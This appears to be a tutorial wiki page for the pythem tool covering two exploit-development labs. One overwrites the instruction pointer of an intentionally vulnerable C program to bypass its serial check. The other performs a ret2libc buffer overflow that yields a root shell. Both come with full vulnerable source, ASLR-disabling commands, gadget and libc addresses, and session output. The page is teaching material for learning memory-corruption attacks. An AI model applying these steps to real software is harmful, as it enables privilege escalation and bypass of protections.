Skip to content

Exploit development

m4n3dw0lf edited this page Aug 16, 2016 · 16 revisions

#Exploit Development

##Exploit Development 1: Overwriting Instruction Pointer

  • Vulnerable Serial-Key C program.
//Code from "Shellcoder's Handbook: Discovering and Exploiting Security Holes"
//Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial
//Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int valid_serial(char *psz){
	size_t len = strlen(psz);
	unsigned total = 0;
	size_t i;
	if (len < 10)
		return 0;
	for(i = 0; i < len ; i++){
		if ((psz[i] < '0') || (psz[i] > 'z' ))
			return 0;

		total += psz[i];
	}
	if (total % 853 == 83)
		return 1;
	return 0;
}

int validate_serial(){
	char serial[24];
	fscanf(stdin, "%s", serial);
	if (valid_serial(serial))
		return 1;
	else
		return 0;
}

int do_valid_stuff(){
	printf("The serial number is valid!\n");
	// do serial-restricted, valid stuff here.
	exit(0);
}

int do_invalid_stuff(){
	printf("Invalid serial number!\nExiting\n");
	exit(1);
}

int main(int argc, char *argv[] ){
	if(validate_serial())
		do_valid_stuff();
	else
		do_invalid_stuff();
	return 0;
}
  • commands:
 pythem> echo 0 > /proc/sys/kernel/randomize_va_space

 pythem> gcc serial.c -fno-stack-protector -o serial
 
 pythem> ./serial
 123456
 Invalid serial number!
 Exiting

 pythem> set file ./serial

 pythem> xploit stdin

 xploit> disas main
 Dump of assembler code for function main:
              ...
 callq  0x400723 <do_valid_stuff>     (Function that only authenticated person has access.)
              ...

 xploit> fuzz
              ...
 [*] Sending buffer with lenght: 39
 [*] Child program exited with code 1

 [*] Hit enter to continue.

 [*] Sending buffer with lenght: 40

 [*] Sending buffer with lenght: 41

 [*] Child program crashed with SIGSEGV code: -11
 ^C
 
 xploit> set arch x64
 
 xploit> set offset
 [+] Enter the offset (number of 'A's): 40
 xploit> set addr1
 [+] First address to overwrite: 0x400723
 
 xploit> xploit
 [+] Writing payload into buffer.txt

 [*] Sending buffer with lenght: 58

 The serial number is valid!

 Exiting 

##Exploit Development 2: Ret2libc

  • Buffer-Overflow vulnerable C program.
// Disable Canaries, Compile: gcc -fno-stack-protector vuln.c -o vuln
// Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[40];
    int r;
    r = read(0, buf, 200);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    return 0;
}


int main(int argc, char *argv[]) {
    printf("Try to sh");
    vuln();
    return 0;
}
  • commands:
 pythem> echo 0 > /proc/sys/kernel/randomize_va_space

 pythem> gcc vuln.c -fno-stack-protector -o vuln  
 
 pythem> set file ./vuln

 pythem> xploit stdin

 xploit> set arch x64

 xploit> fuzz
               ...
 [*] Sending buffer with lenght: 48
               ...
 [*] Child program exited with code: 0
 
 [*] Hit enter to continue.

 [*] Sending buffer with lenght: 49
               ...
 [*] Child program crashed with SIGSEGV code: -11

               ...

 [+] Sending buffer with lenght: 55
               ...
 [+] Instruction Pointer may be near: 55

 [*] Child program crashed with code: -7
                ...
 [*] Sending buffer with lenght: 58
                ...
 [*] Child program crashed with SIGSEGV code: -11
 ^C

Offset around 55 and 58

  xploit> set offset 56

  xploit> search instructions
  [+] Find: % rdi
                ...
  [INFO] File: ./vuln
  0x0000000000400613: pop rdi; ret;

  xploit> set addr1
  [+] First address to overwrite: 0x0000000000400613

  xploit> find "/bin/sh"
                 ...
  Found 1 results, display max 1 items:
  libc : 0x7ffff7b9c598 --> 0x68732f6e69622f ('/bin/sh')

  xploit> set addr2
  [+] Second address to overwrite: 0x7ffff7b9c598

  xploit> p system
                  ...
  $1 = {<text variable, no debug info>} 0x7ffff7a76710 <__libc_system>

  xploit> set shellcode
  [+] Enter the shellcode: 0x7ffff7a76710

  xploit> xploit

  [+] Writing payload into buffer.txt

  [*] Sending buffer with lenght: 98
                   ...
  [!] If it does not work automatically, run on terminal: (cat buffer.txt ; cat) | ./vuln

  xploit> exit
  
  pythem> exit 

  # (cat buffer.txt; cat) | ./vuln
  Try to bash
  Read 98 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAb
  id
  uid=0(root) gid=0(root) groups=0(root)
  whoami
  root
Clone this wiki locally